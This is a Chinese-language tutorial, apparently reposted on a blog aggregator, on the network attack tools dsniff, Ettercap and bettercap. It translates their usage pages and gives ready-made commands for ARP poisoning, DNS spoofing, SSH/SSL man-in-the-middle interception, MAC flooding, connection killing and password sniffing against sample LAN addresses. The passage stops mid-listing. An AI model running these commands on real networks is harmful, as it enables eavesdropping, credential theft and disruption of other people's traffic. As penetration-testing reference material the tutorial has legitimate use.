日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

dsniff 和 Ettercap 和 bettercap 详解 - 网络嗅探工具包

發布時間:2023/12/3 综合教程 36 生活家
生活随笔 收集整理的這篇文章主要介紹了 dsniff 和 Ettercap 和 bettercap 详解 - 网络嗅探工具包 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

?

官網:https://www.monkey.org/~dugsong/dsniff/

linux 嗅探工具 Dsniff 詳解:https://wenku.baidu.com/view/61a178886529647d272852a9.html

ettercap做arp欺騙和dns欺騙-----詳細教程:https://blog.csdn.net/qq_38228830/article/details/81989301
ettercap局域網內DNS欺騙:https://www.cnblogs.com/hkleak/p/5043063.html
Ettercap使用記錄之一:http://www.cnblogs.com/lsbs/p/3842679.html
bettercap--優秀的MITM攻擊測試框架:http://blog.csdn.net/c465869935/article/details/50900067
Ettercap的arpspoof方法:http://wxfplane.blog.51cto.com/10720689/1749951/
局域網攻擊軟件Ettercap中文說明:https://wenku.baidu.com/view/bea211156edb6f1aff001f92.html
強大的嗅探工具ettercap使用教程:我的欺騙規則:http://www.vfocus.net/art/20120214/9763.html

?

?

簡介

?

? ? ? ? Dsniff是一個著名的網絡嗅探工具包。高級口令嗅探工具。綜合性的網絡嗅探工具包。Dsniff其開發者DugSong早在1999年12月,以密歇根大學CITI研究室( CenterforInformationTechnologyIntegration)的研究成果為基礎, 開發了這個后來具有很大影響力的網絡安全工具包。 DugSong開發Dsniff的本意是揭示網絡通信的不安全性, 借助這個工具包, 網絡管理員可以對自己的網絡進行審計, 也包括滲透測試。 但萬事總有其兩面 性, Dsniff所帶來的負面作用也是“巨大”的,首先它是可以自由獲取的,任何擁有這個工具包的人都可能做“非正當”的事,其次, Dsniff里面的某 些工具,充分揭示了一些安全協議的“不安全性”, 例如針對SSH1和SSL的MITM( Man-In-The-Middle) 攻擊工具—SSHmitm和 Webmitm。 SSH1和SSL都是建立網絡通信加密通道的機制,向來被認為是很安全的,但人們在具體使用時,往往因為方便性上的考慮而忽視了某些環 節,造成實事上的不安全。 所以說, 最大的不安全性, 往往并不在于對安全的一無所知, 而在于過于相信自己的安全。
? ? ? ? DubSong在2000年12月發布了Dsniff的v2.3版本,該版本支持 OpenBSD、 Linux、 Solaris系統平臺。目前,最新版本是2001年3月發布的 v2.4b1的 Beta版。 Dsniff的下載網址:http://monkey.org/~dugsong/dsniff/?。除了針對Unix系統的版本,從網上也可以得到Windows平臺上運行的Dsniff早期版

?

dsniff工具介紹

dsniff是純粹被動的進行網絡活動監視的工具,包括: dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy針對SSH和SSL的MITM ( Man-In-The-Middle)“攻擊”工具,包括sshmitmwebmitm發起主動欺騙的工具,包括:arpspoof、 dnsspoof、 macof其它工具,包括tcpkill、 tcpnice

?

Dsniff包中的工具基本上可以分為四類:
1. 純粹被動地進行網絡活動監視的工具,包括:dsniff、filesnarf、mailsnarf、msgsnarf、urlsnarf、webspy、sshow。
2. 針對SSH和SSL的MITM“攻擊”工具,包括sshmitm和webmitm。
3. 發起主動欺騙的工具,包括:arpspoof、dnsspoof、macof。
4. 其它工具,包括tcpkill、tcpnice。

?

dsniff

dsniff是一個密碼偵測工具, 他能夠自動分析端口上收到的某些協議的數據包, 并獲取相應的密碼。 dnisff支持的協議有 FTP,Telnet, SMTP,HTTP,POP,poppass, NNTP,IMAP,SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer,MicrosoftSMB,OracleSQL*Net,SybaseandMicrosoftSQL。

用法:dsniff [-c] [-d] [-m] [-n] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]]]  [-r|-wsavefile] [expression]選項-c     打開半雙工TCP流,允許在使用 arpspoof時進行正確的嗅探操作-d     啟動調試模式;-m     使用dsniff.magic文件,通過在magic文件中定義的特征,嘗試自動判斷協議-n     不把 IP 地址解析成主機名-i interface       指定網絡接口-p pcapfile        不是處理網絡上所觀察到的數據包的內容,而是處理給定捕獲數據包的PCAP文件。              -s snaplen         對報文的前snaplen個字節進行嗅探,而不是默認的1024字節;.-f services        以/etc/service格式從文件中加載觸發器(也就是口令嗅探的服務類型);-t trigger[,...]使用格式 port/proto=service 來加載一個以逗號界定的觸發器集(e.g. 80/tcp=http).dsniff –t 21/tcp=ftp,23/tcp=telnet –m-r savefile        從保存的文件中讀取會話(-w 選項 可以保存會話到文件)-w file            保存 會話 到文件中expression         指定一個 tcpdump(8) filter expression 來讓 sniff 選擇要嗅探的流量.     在掛起的信號中,dsniff會將當前的觸發器表轉儲到dsniff.services。FILES/usr/share/dsniff/dsniff.servicesDefault trigger table/usr/share/dsniff/dsniff.magicNetwork protocol magic參見;另請參閱arpspoof(8), libnids(3), services(5), magic(5)

?

filesnarf 和 mailsnarf 和?msgsnarf 和?urlsnarf 和?webspy 和?webspy

filesnarf 和 mailsnarf 和 msgsnarf 和 urlsnarf 和 webspy 和 webspy ?使用方式都 差不多。可以 使用 man 查看具體使用。

FILESNARF(8)                System Manager's Manual               FILESNARF(8)NAMEfilesnarf - sniff files from NFS trafficSYNOPSISfilesnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]DESCRIPTIONfilesnarf  saves  files sniffed from NFS traffic in the current workingdirectory.OPTIONS-i interface  指定監聽接口-p pcapfile   處理捕獲的 包文件-v            "反轉" 模式.  反轉匹配,選中不匹配的文件.pattern       指定正則表達式              expression    指定 一個要嗅探的流量的 tcpdump(8) 過濾表達式 SEE ALSOdsniff(8), nfsd(8)

?

filesnarf

filesnarf 可以嗅探網絡文件系統( NFS) 的流量, 并選定某個文件, 轉儲到本地當前工作目錄。

Tcpdump 可用于嗅探NFS流量。Filesnarf 工具可以真正的接收被嗅探的文件,并在系統上對其重新配置。某人在任何時候在網絡上通過NFS移動文件時,你都可以獲得該文件的一個副本。

  同樣可以使用-i選項來指定網絡接口。
在命令行上,可以指定Tcpdump報文過濾器表達式,用于嗅探NFS流量,并且可以指定要匹配的文件模式

如:想嗅探 192.168.0.21上的mp3文件則
# filesnarf *.mp3 host 192.168.0.21

?

mailsnarf

milsnarf 可以嗅探 SMTP 和 POP 流量,并以Berkeley郵件格式輸出e-mail消息,轉儲選定的郵件內容到本地。

?

msgsnarf

msgsnarf 可以嗅探聊天軟件的聊天內容,包括 AOL,ICQ 2000, IRC, MSN Messenger, 或 YahooMessenger

?

urlsnarf

urlsnarf可以嗅探HTTP請求報文的內容,并以CLF(CommonLogFormat)通用日志格式輸出。這種格式是許多Web服務器所使用的,例如IIS和Apache,事后可以很方便的用一些日志分析工具來分析記錄結果。 Urlsnarf的工作方式就象這個工具箱中的其他嗅探程序一樣,它是根據web url工作的。
它將自己從http流量中嗅探到的任何url存儲到一個日志文件中,可以在以后對該日志文件進行分析。
它是查看在局域網上瀏覽信息的最簡便方法。

?

webspy

webspy指定一個要嗅探的主機, 如果指定主機發送HTTP請求, 打開網頁, webspy也會通過 netscape 瀏覽器在本地打開一個相同的網頁。

即將嗅探到的來自某個客戶端的URLs請求發送給本地瀏覽器顯示,可以達到“實時”監視網絡上HTTP活動的效果。 Dsniff中軟件的最后一個工具,主要是通過指定lan上主機ip地址,Webspy是將嗅探從該主機發源的web流量。無論任何時候,只要從這臺主機進入特定的一個url,Webspy都會在瀏覽器上加載相同的URL。

?

sshow

對嗅探到的SSH通信進行分析,解析其認證過程、交互會話的口令長度,以及命令行長度等信息。

?

?

SSH 中間人攻擊 sshmitm 和 SSL 中間人攻擊 webmitm

sshmitm

Dsniff還包含了大量mim竊取密碼的方式,在這種方式下即使是ssl方式https 和ssh都是可以被中途截取的,非常的強大。當然這種方式僅僅用于同一個局域網中。

Sshmitm 是Dsniff自帶的一個具有威脅的工具之一。如果你是在運行dnsspoof來偽造實際機器主機名,那么sshmitm可以重新定向到你的機器的ssh流量。因為它支持到ss1,所以這也是我們需要考慮把ssh升級到2的原因。

sshmitm是Dsniff自帶的一個具有威脅的工具之一。首先通過dnsspoof偽造實際機器主機名將攻擊目標主機的 SSH連接轉到本地,那么 sshmitm可以截獲來自主機的密鑰,并獲得被劫持連接中的所有信息解碼,然后重新轉發SSH流量到SSH服務器。sshmitm可以對某個 SSH會話發動 MITM( Monkey-In-The-Middle)攻擊(注意,這里的Monkey是Dsniff包 readme文件中的解析, 而不是常見的Man, 這種區別實際上是沒有“區別”, 也許就是因為Dsniff以猴子做為其標志的原因吧)。 通過 sshmitm, 攻擊者可以捕獲某
個SSH會話的登錄口令,甚至可以“劫持”整個會話過程(攻擊者在其主機上通過OpenSSL提供的代碼生成偽造的證 書, 以欺騙目標主機, 使之相信就是有效的通信另一方, 結果是,攻擊者主機成了SSH安全通道的中轉站)。 目前, 對于SSH1, 這種MITM攻擊已經構成了嚴重的威脅。 MITM并不是一個新的概念, 它是一種對認證及密鑰交換協議進行攻擊的有效手段。 通常, 在SSH會話中, 服務器首先會給客戶端發送其公鑰, 嚴 格來說, 這種密鑰的交換和管理應該是基于X.509這種公鑰基礎設施( PKI)的,但因為PKI本身的復雜性導致真正應用了這種公鑰管理機制的服務器非常 少,所以,通常情況下,服務器只是簡單的自己生成密鑰對,并將其中的公鑰發送給客戶端。客戶端收到服務器的公鑰后,必須獨立驗證其有效性。通常,使用 SSH的客戶端會由sysadmin或其它賬號來維護一個“密鑰/主機名”的本地數據庫,當首次與某個SSH服務器建立連接時,客戶端可能被事先配制成自 動接受并記錄服務器公鑰到本地數據庫中,這就導致可能發生MITM攻擊。其實,建立加密的安全網絡都存在一個基本的問題,無論如何,
某種程度上講,加密通 道的初始化連接總是建立在一個存在潛在危險的網絡之上的,如果密鑰交換機制并不健全,或者是根本就被忽略了,那之后建立起來的加密通道也形同虛設了。按道 理講, SSH之類的協議本身是沒有問題的, 只要嚴格按照標準來建立加密及密鑰交換管理機制( 例如PKI), 攻擊者是根本不會有可乘之機的, 可問題就在于, 許多時候, 為了使用上的方便, “復雜”的保證技術就被人們拋之腦后了。 當然, 一種協議如果其可用性并不很強, 也許本身就是問題, 現在, SSH2較SSH1 已經有了較大改進。具體來說, 在某個SSH連接建立之初,如果客戶端收到一個未知的服務器端公鑰, OpenSSH會有下列配置處理方式:自動增加該公鑰到本地數據庫; 發出下面列出的警告消息,并詢問用戶是添加該公鑰還是放棄連接;
------------------------------------------------------------------------

--WARNING:HOSTIDENTIFICATIONHASCHANGED!--

------------------------------------------------------------------------
ITISPOSSIBLETHATSOMEONEISDOINGSOMETHINGNASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that the host-key has just been changed. Please contact your system administrator.?

拒絕接受。如果客戶端對未知公鑰的驗證被取消了 ( 或者客戶端配置本身已經旁路掉了這個過程), 或者如果客戶端保存已知主機CA證書的緩存被“毒害”了, 就 很有可能導致攻擊者發起MITM攻擊。從根本上講,要防止MITM方式的攻擊,用戶自身加強安全措施才是關鍵, 例如, 密鑰的初始交換也許可以換做其它方式 ( 比如軟盤), 嚴格管理本地的證書列表數據庫, 對于出現的告警提示, 應該仔細甄別, 防止第三方的欺騙行為

?

webmitm

webmitm與sshmitm類似,也需要dnsspoof的“配合”,不同的是,webmitm“劫持”的是HTTP和HTTPS會話過程,捕獲SSL的加密通信

?

?

arpspoof

arp毒化的原理,簡單的說就是偽造MAC地址與IP的對應關系,導致數據包由中間人轉發出去。

詳細介紹請看:http://www.2cto.com/Article/201207/144532.html

arp 毒化有雙向(remote)和單向(oneway)兩種方式。

雙向方式將對兩個目標的ARP緩存都進行毒化,對兩者之間的通信進行監聽。

單向方式只會監聽從第一個目標到第二個目標的單向通信內容。

一般來說,我們會選擇使用雙向欺騙的方式來獲取所有的數據包進行嗅探分析。

若目標主機開啟了ARP防火墻怎么辦?直接欺騙會引發報警且無效果。這時就是單向ARP毒化大顯神威的時候了。只要路由器沒有對IP和MAC進行綁定,我們就可以只欺騙路由器,使從路由器發給目標主機的數據包經過中間人,完成我們的攻擊。

root@kali:~# arpspoof -h
Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host名字arpspoof - 在交換式網絡截獲包
概要arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
描述 arpspoof 通過偽造ARP響應,重定向局域網中一個目標主機(或所有主機)上的數據包 到 局域網中的另一個主機上。這在交換式網絡上嗅探流量是一個非常有效的方法注意:內核IP轉發(或一個實現相同功能的用戶程序,如 fragrouter(8))必須提前打開。選項-i 網卡接口        指定使用的網卡接口-c own|host|both   指定在恢復arp配置時使用的硬件地址;在清理時,可以用自己的地址和主機的地址發送數據包。用一個假的硬件地址發送數據包可能會破壞與某些switch/ap/bridge 配置的連接,但是它比使用自己的地址更可靠,這是arpspoof事后清理的默認方式。-t target    指定要 ARP毒化 的主機(如果沒有指定,默認局域網所有主機). 可以重復指定多個主機。-r           毒化兩個主機(主機和目標)以捕獲兩個方向的流量。(只在與 -t 聯合使用才有效)host         指定你希望攔截數據包的主機(通常是本地網關)。參見;另請參閱dsniff(8), fragrouter(8)// 使用ARP毒化,重定向受害者的流量傳送給攻擊者。
root@bt:~# arpspoof -i eth0 -t 192.168.1.5 192.168.1.1    // 第二個ARP毒化攻擊使網關的數據重定向到攻擊者的機器(流量由網關到攻擊者再到受攻擊者)
root@bt:~# arpspoof -i eth0 -t 192.168.1.1  192.168.1.2   root@bt:~# arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
root@bt:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.5

arpspoof 啟用 arp欺騙,將自己網卡的IP地址偽裝成指定IP地址的MAC持續不斷的發送假的ARP響應包給一臺或多臺主機,以“毒害”其ARP緩存表。一旦成功,即可以用別的嗅探工具來“接收”發送到本地的數據包。與Ettercap不同的是, arpspoof并不進行真正的“嗅探”,它只是簡單的進行ARP欺騙,本地主機 必須啟動內核的IP Forwarding功能(或者使用fragrouter這樣的工具),否則,所有“轉向”發到本地的數據包就如同進了黑洞, 正常的網絡通信將無法進行, 而一旦啟動了本地的IP Forwarding,內核將自動對本地收到的目的IP卻是別處的數據包進行轉發,正常的通信自然可以進行。這樣,就可以進行后續的工作,包括分析嗅 探得到的數據包、修改數據包中的某些信息以重新轉發等等。

Ettercap則不光進行ARP欺騙,它還要做后續的許多工作,包括分析嗅探得到的數據包、修改數據包中的某些信息以重新轉發等等。

在Linux中,缺省是禁止IP Forwarding的,可以使用下面命令啟動它:
啟用IP轉發,輸入下面命令(PS:利用Linux主機的路由功能):

root@bt:~# cat /proc/sys/net/ipv4/ip_forward
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~# cat /proc/sys/net/ipv4/ip_forward

或者 修改下面文件

修改       #vi /etc/sysctl.conf          修改 net.ipv4.ip_forward=1
修改后運行 #sysctl –p                   命令使得內核改變立即生效;

一旦啟動了本地的 IP Forwarding,內核將自動對本地收到的目的IP是別處的數據包進行轉發,
(同時向數據包的源地址發送ICMP重定向報文, 當然, 由于啟用了ARP欺騙, 這個重定向報文是不起作用的)。

?

arpspoof?[-i?interface] [-t?target]?host????如 果不指定tagget則向網絡中所有的主機發送欺騙

?

dnsspoof

root@kali:~# dnsspoof -h
Version: 2.4
用法: dnsspoof [-i interface] [-f hostsfile] [expression]描述       dnsspoof啟用DNS欺騙,如果dnsspoof嗅探到局域網內有DNS請求數據包,它會分析其內容,并用偽造的DNS響應包來回復請求者。如果是請求解析某個域名,dnsspoof會讓域名重新指向另一個IP地址(黑客所控制的主機),如果反向IP指針解析,也會返回一個偽造的域名.在dnsspoof的命令選項中,可以指定一個主機列表文件,文件格式與/etc/hosts相同,如果不指定該文件,dnsspoof會返回本地的IP給域名解析請求者。選項-i interface    指定使用的網卡-f hostsfile    指定要欺騙的網址。如果不指定hostsfile,將返回本機的IP地址給攻擊者expression      指定一個tcpdump(8)過濾器表達式來選擇要嗅探的流量。就是指定一個Tcpdump準則 的 包過濾文件/usr/share/dsniff/dnsspoof.hostsSample hosts file.參見;另請參閱dsniff(8), hosts(5)   // man 8 dsniff   或者  man 5 hosts

root@bt:#dnsspoof -i eth0 -f /usr/h22.hosts

dnsspoof?[-i?interface] [-f?hostsfile] [expression]???這里-f 可以指定主機列表文件,文件格式與/usr/local/lib/dnsspoof.hosts相同,如果不指定該文件,dnsspoof會返回本地的 IP給域名解析請求者

這里本地主機會搶先代替DNS服務器來相應查詢,前提是本地主機先回答DNS查詢,如果因為 網絡問題,DNS服務器先發送了應答,DNS欺騙就不能生效了

?

macof

?

macof?用來進行 MAC flooding,可以用來使交換機的MAC表溢出,對于以后收到的數據包以廣播方式發送。

注意:在進行MAC泛洪之前就存在于交換機MAC表中的條目不會被覆蓋,只能等到這些條目自然老化

在本地網絡中發送大量的隨機MAC地址的數據包,可以指定源IP、目的IP、源端口、目的端口,

以MAC洪水的方式來導致某些交換機喪失“交換”能力,以達到共享式嗅探的目的。

NAMEmacof - 用隨機 MAC 地址 洪泛 交換式局域網絡用法macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport][-n times]選項-i interface    指定發送的網卡接口-s src      指定源 IP 地址-d dst      指定目的 IP 地址-e tha      指定目標硬件地址-x sport    指定 TCP 源端口-y dport    指定 TCP 目的端口-n times    指定發送包 的 個數任何未指定的選項的值都是隨機生成的。參見;另請參閱dsniff(8)

macof?[-i?interface] [-ssrc] [-ddst] [-e?tha] [-xsport] [-ydport] [-n?times]

?

tcpkill

tcpkill能夠切斷指定的TCP會話連接,主要是基于TCP的三次握手過程。?中斷特定的TCP連接。

root@kali:~# tcpkill -h
Version: 2.4
Usage: tcpkill [-i interface] [-1..9] expressionNAMEtcpkill - kill TCP connections on a LAN選項-i interface    指定監聽接口-1...9         指定在殺死連接時使用的蠻力的程度。為了在移動的接收窗口中找到一個RST,快速連接可能需要一個更高的數字。默認是3。expression     指定一個tcpdump(8)過濾器表達式來選擇要殺死的連接SEE ALSOdsniff(8), tcpnice(8)

?

這里,當tcpkill檢測到兩邊的TCP連接后,會同時想兩邊(冒充對方)發送tcp reset報文,重置連接。

?

tcpnice

tcpnice能夠通過在添加活動的流量,降低指定的LAN上的TCP連接的速度

tcpnice?[-I] [-iinterface] [-nincrement]?expression???這里的-n后面可以跟1-20,代表降低的速度,1為原速,20為最低

?

?

其它交換網絡嗅探器

Ettercap

官網:http://www.ettercap-project.org

Ettercap簡要原理介紹以及使用說明:http://www.2cto.com/article/201301/183322.html

Ettercap使用記錄之一 、二、三:http://www.cnblogs.com/lsbs/p/3842679.html?

man ettercap:https://linux.die.net/man/8/ettercap

?

?

用法:

用法: ettercap [選項] [目標1] [目標2]目標寫法:(可以查看 man ettercap 獲取更詳細信息)
目標寫法格式是:  MAC/IPs/PORTs   。依照這個規則,我們把目標可以精確到特定的主機和端口上。MAC、IP、和PORT為三個條件,為空代表ANY。
"//80"即表示對任意MAC、任意IP上的80端口進行嗅探。一般來說,MAC部分留空,除非你愿意去手動輸入那一長串的MAC地址。因此,我們可以只用IP部分來確定目標主機。注意:如果 IPv6 啟用,目標是 MAC/IPs/IPv6/PORTs 這種形式。 即 mac地址,ip地址,端口號中間用 "/" 符號隔開,留空不寫表示 “ANY”,即所有。當IP有多個的時候,可以用英文","分隔不同的C段ip。可以用"-"表示連續的ip。可以用";"分隔不同表達形式的ip。
舉例如下:"10.0.0.1-5;10.0.1.33" 表示 ip 10.0.0.1, 2, 3, 4, 5 和 10.0.1.33
端口部分也有類似的寫法,看例子:"20-25,80,110" 表示 20, 21, 22, 23, 24, 25, 80 和 110例如: /192.168.1.1/                  表示 192.168.1.1 的所有端口號aa:bb:cc:dd:ee:ff//80          表示 aa:bb:cc:dd:ee:ff 的80端口.	 其中多個mac地址用英文符號分號 ';' 隔開。多個ip地址和端口號可以用符號 '-' 表示連續 和 英文符號分號 ';' 隔開;e.g."10.0.0.1-5;10.0.1.33"                    表示 10.0.0.1, 2, 3, 4, 5 和 10.0.1.33      "20-25,80,110"                            表示 20, 21, 22, 23, 24, 25, 80 和 110/192.168.1.100-120;192.168.2.130/         表示 /192.168.1.100,101,102,103,~~120;192.168.12.130/ 這兩個目標是為了過濾從一個到另一個之間的流量,反之亦然(因為連接是雙向的)。"//80"                                    表示任意MAC地址,任意 IP ,但是端口是80 的目標。"/10.0.0.1/"                              表示任意 MAC地址,IP是10.0.0.1,任意端口 的 目標    "//"                                      表示 "子網中所有主機"。注意:可以在命令行用 -R 選項 反向 匹配 目標. So if you want to sniff如果要嗅探除了10.0.0.1目標的所有進出流量。可以這樣寫:"./ettercap -R /10.0.0.1/"注意:目標也就是對局域網初始掃描掃描的主機。你可以通過netmask來限制只掃描網絡中的一部分主機。結果是掃描兩部分目標后后并的結果。還記得沒有指定目標就意味著“沒有目標”,但是指定“//”意味著“子網中的所有主機”。嗅探 和 攻擊 選項:-M, --mitm <method:args>    中間人攻擊,即兩臺終端間進行欺騙。(后面跟的參數可以參看 man ettercap)-o, --only-mitm             不嗅探,只執行中間人攻擊-b, --broadcast             嗅探廣播數據包-B, --bridge <IFACE>        使用橋接嗅探 (需要2個網絡接口)。即 雙網卡之間進行欺騙-p, --nopromisc             不把網絡接口設置成混雜模式-S, --nosslmitm             不偽造SSL證書。即不使用ssl中間人攻擊-u, --unoffensive           不轉發數據包-r, --read <file>           從 pcapfile <file> 讀取數據-f, --pcapfilter <string>   set the pcap filter <string>-R, --reversed              反轉目標匹配。(即 匹配所有和目標不匹配的)-t, --proto <proto>         設置要嗅探的協議(默認嗅探所有)--certificate <file>    ssl中間人攻擊使用指定的 證書文件 --private-key <file>    ssl中間人攻擊使用指定的 私鑰文件 運行界面類型:-T, --text                  文本模式顯示 -q, --quiet            安靜模式,不顯示嗅探數據 -s, --script <CMD>     加載腳本 -C, --curses                curses-UI模式 -D, --daemon                守護模式(后臺模式)(no GUI)-G, --gtk                   GTK-UI模式 日志記錄選項:-w, --write <file>          把嗅探到的數據寫入到 pcapfile <file>-L, --log <logfile>         把所有數據包保存<logfile>日志文件中 -l, --log-info <logfile>    僅僅記錄被動信息到這個<logfile>日志文件中-m, --log-msg <logfile>     將所有的消息記錄到這個<logfile>日志中。-c, --compress              使用gzip壓縮日志文件可視化選項:-d, --dns                   把IP地址解析成主機名-V, --visual <format>       顯示方式 -e, --regex <regex>         使用一個正則表達式 -E, --ext-headers           為每個pck打印擴展標題-Q, --superquiet            超級安靜模式,啥信息都不顯示,只保存 LUA腳本 選項:--lua-script <script1>,[<script2>,...]     使用逗號分割lua腳本--lua-args n1=v1,[n2=v2,...]               使用逗號分割傳給lua腳本的參數通用基本選項:-i, --iface <iface>         指定網絡接口-I, --liface                顯示所有網絡接口-Y, --secondary <ifaces>    后備網卡-n, --netmask <netmask>     在網絡接口上強制使用這個 <netmask> 網絡掩碼-A, --address <address>     ip地址,針對一網卡多ip的情況 -P, --plugin <plugin>       載入插件-F, --filter <file>         載入過濾器文件 (content filter)-z, --silent                不進行arp毒化和主機掃描 -6, --ip6scan               在鏈路上發送 ICMPv6 探測和發現 IPv6 節點-j, --load-hosts <file>     從文件中載入主機列表-k, --save-hosts <file>     保存主機列表到文件中-W, --wifi-key <wkey>       載入 WIFI 密碼(wep或wpa)-a, --config <config>       載入并使用一個非默認配置文件標準選項:-v, --version               打印版本信息并退出-h, --help                  顯示幫助信息

Ettercap有兩種運行方式,UNIFIED 和 BRIDGED。

其中,UNIFIED的方式是以中間人方式嗅探;BRIDGED方式是在雙網卡情況下,嗅探兩塊網卡之間的數據包。

UNIFIED方式的大致原理:

UNIFIED方式是同時欺騙A和B,把原本要發給對方的數據包發送到第三者C上,然后由C再轉發給目標。
這樣C就充當了一個中間人的角色。因為數據包會通過C那里,所以C可以對數據包進行分析處理,導致了原本只屬于A和B的信息泄露給了C。
UNIFIED方式將完成以上欺騙并對數據包分析。
Ettercap劫持的是A和B之間的通信,在Ettercap眼中,A和B的關系是對等的。

?

BRIDGED方式原理:

BRIDGED方式 有點像筆記本電腦上有兩個網卡,一個有線網卡一個無線網卡。可以將有線網卡的internet連接共享給無線網卡,這樣筆記本就變成了一個無線ap。
無線網卡產生的所有數據流量都將傳送給有線網卡。BRIDGED方式ettercap嗅探的就是這兩塊網卡之間的數據包。

一般而言,我們會使用UNIFIED方式。其運行參數為 -M(M是MITM的首字母,為中間人攻擊的縮寫)。

Ettercap,它相當于ARP病毒和密碼嗅探界的瑞士軍刀。通常在非互動模式中使用它,但是默認情況下它的交互界面非常友好,使用起來很方便。
如果我們的目標是網絡上的所有主機,想要嗅探每個節點之間的所有傳輸,我們可以用下列命令: ettercap -T -q -M ARP // //
你應當謹慎的使用上面那段命令,因為如果把一個大網絡中所有的傳輸都通過一臺很慢的計算機的話,那么這很有可能使整個網絡連接癱瘓。
可以找個替罪羊,來看看 Ip 地址為 192.168.1.1 的主機,我們可以使用如下命令:ettercap -T -q -M ARP /192.168.1.1/ //
如果192.168.1.1是網關,我們應該可以看到所有的輸出傳輸。下面是這些命令行選項的功能:
-T    告訴Ettercap使用文字界面,我最喜歡這個選項,因為GUI模式太復雜了。
-q    讓Ettercap安靜些,換句話說就是少些冗長的文字報告。
-M    讓Ettercap我們想要使用的MITM(人參與其中)方式,本例中是ARP病毒。

中間人攻擊-ARP毒化:http://www.2cto.com/article/201207/144532.html

常見的參數組合:

#arp毒化eth0所在的網段,安靜模式文本顯示
ettercap -Tqi eth0 -M ARP // // #監聽10.0.0.1的ftp,ssh,telnet信息,并保存到本地
ettercap -Tzq /10.0.0.1/21,22,23  -w hack.pcap #對192.168.1.120進行dns欺騙,使用默認網卡eth0,文本模式安靜顯示 
ettercap -Tq -P dns_spoof -M arp /192.168.1.120/ //   #使用過濾并監聽10.0.0.2在80端口的所有通信,安靜模式文本顯示,保存數據到本地   
ettercap -Tqi eth0 -L sniffed_data -F filter.ef -M arp:remote /10.0.0.2/80 //     在控制臺模式下(-T)不使用混雜模式(-p),你只會看到自己的通信。
ettercap -Tp在控制臺模式下(-T),不使用ARP初始化(-z),不顯示數據包內容(-q安靜模式),但是會顯示用戶名和密碼和其他消息。
ettercap -Tzq在控制臺模式下(-T),加載主機列表(-j),對目標執行arp毒化中間人攻擊(-M arp)
ettercap -T -j /tmp/victims -M arp /10.0.0.1-7/ /10.0.0.10-20/在控制臺模式下(-T),對整個局域網執行ARP毒化攻擊(-M arp)
ettercap -T -M arp // //在控制臺模式下(-T),執行ARP雙向欺騙(-M arp:remote)
ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.2-10/在控制臺模式下(-T),不使用ARP初始化(-z),使用安靜模式(-q),監聽所有主機110端口(pop3協議端口)
ettercap -Tzq //110在控制臺模式下(-T),不進行ARP初始化(-z),使用安靜模式(-q),監聽目標10.0.0.1的21,22,23端口(FTP、SSH、TELNET)
ettercap -Tzq /10.0.0.1/21,22,23打印輸出可用插件列表。
ettercap -P list

ettercap局域網內DNS欺騙:http://www.cnblogs.com/lvchenfeng/p/5596572.html

強大的嗅探工具ettercap使用教程:http://www.yunsec.net/a/security/web/invasion/2012/0127/9982.html

?

?

bettercap?

bettercap 官網 DOC:https://www.bettercap.org/

Bettercap 使用指南:http://xiaix.me/bettercap-shi-yong-zhi-nan/

完整,模塊化,輕量級,易擴展的MITM框架 – bettercap:http://www.freebuf.com/sectool/73287.html

 _          _   _
| |__   ___| |_| |_ ___ _ __ ___ __ _ _ __
| '_ \ / _ \ __| __/ _ \ '__/ __/ _` | '_ \
| |_) |  __/ |_| ||  __/ | | (_| (_| | |_) |
|_.__/ \___|\__|\__\___|_|  \___\__,_| .__/|_| v1.6.1b
http://bettercap.org/更多示例和幫助文檔 https://bettercap.org/docs/用法: bettercap [options]主要選項:-I, --interface IFACE            網卡接口名 - 默認: eth0--use-mac ADDRESS            執行攻擊前指定網卡的 MAC 地址.--random-mac                 執行攻擊前使用隨機的 MAC 地址.-G, --gateway ADDRESS            手動指定網關地址。如果不指定,則使用當前的網關地址 -T, --target ADDRESS1,ADDRESS2   目標 IP 地址,如果不指定,則目標就是所有的子網地址。--ignore ADDRESS1,ADDRESS2   要忽略的 IP 地址。--no-discovery               不要主動搜索主機,只使用當前的ARP緩存,默認為false。--no-target-nbns             禁用目標NBNS主機名解析。--packet-throttle NUMBER     秒數(可以是一個十進制數)在每個數據包之間等待發送的時間。--check-updates              將檢查是否有更新可用,然后退出。-R, --rainbows                   彩虹的輸出,因為這是一個非常有用的東西(requires the "lolize" gem to be installed)。-h, --help                       顯示可用的選項。日志選項:-O, --log LOG_FILE               將所有消息記錄到一個文件中,如果沒有指定日志消息將只會打印到shell中。--log-timestamp              在每一行日志中啟用時間戳,默認禁用-D, --debug                      啟用調試日志記錄。--silent                     廢棄所有不是錯誤或警告的信息,默認為false.即只記錄錯誤和警告日志。欺騙選項:-S, --spoofer NAME               使用欺騙模塊。 可用的模塊: NONE, ICMP, ARP, NDP 。 默認: IPv4 是 ARP, IPv6 是 NDP.--no-spoofing                禁用欺騙。 等價于 --spoofer NONE.--full-duplex                啟用雙工 MITM。這將使 bettercap 在 目標 和 路由器 之間進行雙向中間人攻擊--kill                       這個 開關 使 目標連接 被殺死,而不是轉發數據包.嗅探選項:-X, --sniffer                    啟用 嗅探.-L, --local                      Parse packets coming from/to the address of this computer ( 注意:  -X 必須設置 ), 默認false.--sniffer-source FILE        載入 捕獲的包 PCAP 文件( will enable sniffer ).--sniffer-output FILE        保存 捕獲的包 PCAP 到文件中 ( will enable sniffer ).--sniffer-filter EXPRESSION  Configure the 